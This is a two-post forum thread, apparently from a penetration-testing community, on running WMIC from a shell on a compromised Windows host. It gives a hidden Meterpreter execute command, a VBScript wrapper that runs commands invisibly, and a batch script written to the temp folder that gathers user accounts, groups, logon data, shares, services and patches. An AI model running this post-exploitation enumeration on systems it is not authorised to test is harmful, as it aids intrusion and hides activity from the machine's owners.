Results 1 to 2 of 2

Thread: Running WMIC in Command Shell

  1. #1

    Default Running WMIC in Command Shell

    WMIC is one of those Windows command that you just love do to its flexibility but sadly when you have a shell you are not able to run it because it breaks the shell losing possible hours of work to achieve the shell and possibly by running the attack again one might bring down the target server. I found that the best way to run WMIC is with Metasploit Meterpreter by executing the command in the following way in Meterpreter:
    Code:
    execute -H -f wmic.exe  "/append:c:\windows\temp\34des34.txt process get name,processid,commandline"
    you must make sure that the command is ran as hidden with the "-H" option and that you do not use the "-i" and "-c" options since by using this options it will break the shell. To get the output of our commands we make sure that we use the "/append:" so we can collect the output of our commands in to a sigle text file that we can later open from withing Meterpreter or download such file.

    When not using Meterpreter and running from a simple command shell like from netcat I use to use in the past SC to create a service that would execute a script with all of my wmic commands or use schtasks or at to schedule the command and then collect the output but this proved to be very time consuming and prone to error. So I changed my approach and started using WSH scripting to execute wmic for me. it works in the following manner, I first create a vb script for executing my wmic commands, it can be even used to execute Powershell!!!
    Code:
    echo CreateObject("Wscript.Shell").Run Wscript.Arguments(0), 0, False > execcmd.vbs
    the we can execute our wmic command in the following manner:
    Code:
    cscript //nologo execcmd.vbs "wmic /append:c:\windows\temp\34des34.txt process get name,processid,commandline"
    we can get the output by running:

    type c:\windows\temp\34des34.txt

    we can even script out entire enumeration by doing something like this:
    Code:
    echo wmic /append:c:\windows\temp\34des34.txt computersystem list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt useraccount list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt group list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt service list brief >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt volume list brief >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt process list brief >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt startup list full >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt rdtoggle list >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt qfe >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,filesystem,name,size >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,name,freespace,size >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt volume get label,freespace,filesystem,capacity,driveletter >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,lastlogon >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,badpasswordcount >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt desktop get screensaversecure,screensavertimeout >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logon get authenticationpackage >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netclient get name >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netuse get name,username,connectiontype,localname >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt nteventlog get path,filename,writeable >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt os get name,servicepackmajorversion >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt service get name,startmode,state,status >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt product get name,version >> c:\windows\temp\sdcx.cmd
    once the script is generated we execute the script by running:
    Code:
    cscript //nologo execcmd.vbs "cmd /c c:\windows\temp\sdcx.cmd"

  2. #2

    Default

    a better formated script generation that will make the output much easier to read and fond relevant info
    Code:
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Computer Information				  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt computersystem list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Account Information				      >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt useraccount list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			User Group Information				  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt group list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Services Information				  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt service list brief >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Volume Information				  	  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt volume list brief >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Running Processes Information		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt process list brief >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			System Startup Information			  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt startup list full >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Terminal Services Information		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt rdtoggle list >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Hotfix Information				  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt qfe >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Ligical Disk Information			  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,filesystem,name,size >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logicaldisk get description,name,freespace,size >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Netlogin Information				  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,lastlogon >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netlogin get name,badpasswordcount >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Screen Saver Information			  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt desktop get screensaversecure,screensavertimeout >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 		Authentication Methods Information		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt logon get authenticationpackage >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Network Services Information		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netclient get name >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			Connected Share Information			  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt netuse get name,username,connectiontype,localname >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 		Eventlog Configuration Information		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt nteventlog get path,filename,writeable >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 			OS Version and SP Information		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt os get name,servicepackmajorversion >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo echo 		Programs Installed from and msi 		  >> c:\windows\temp\sdcx.cmd
    echo echo *********************************************** >> c:\windows\temp\sdcx.cmd
    echo wmic /append:c:\windows\temp\34des34.txt product get name,version >> c:\windows\temp\sdcx.cmd

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •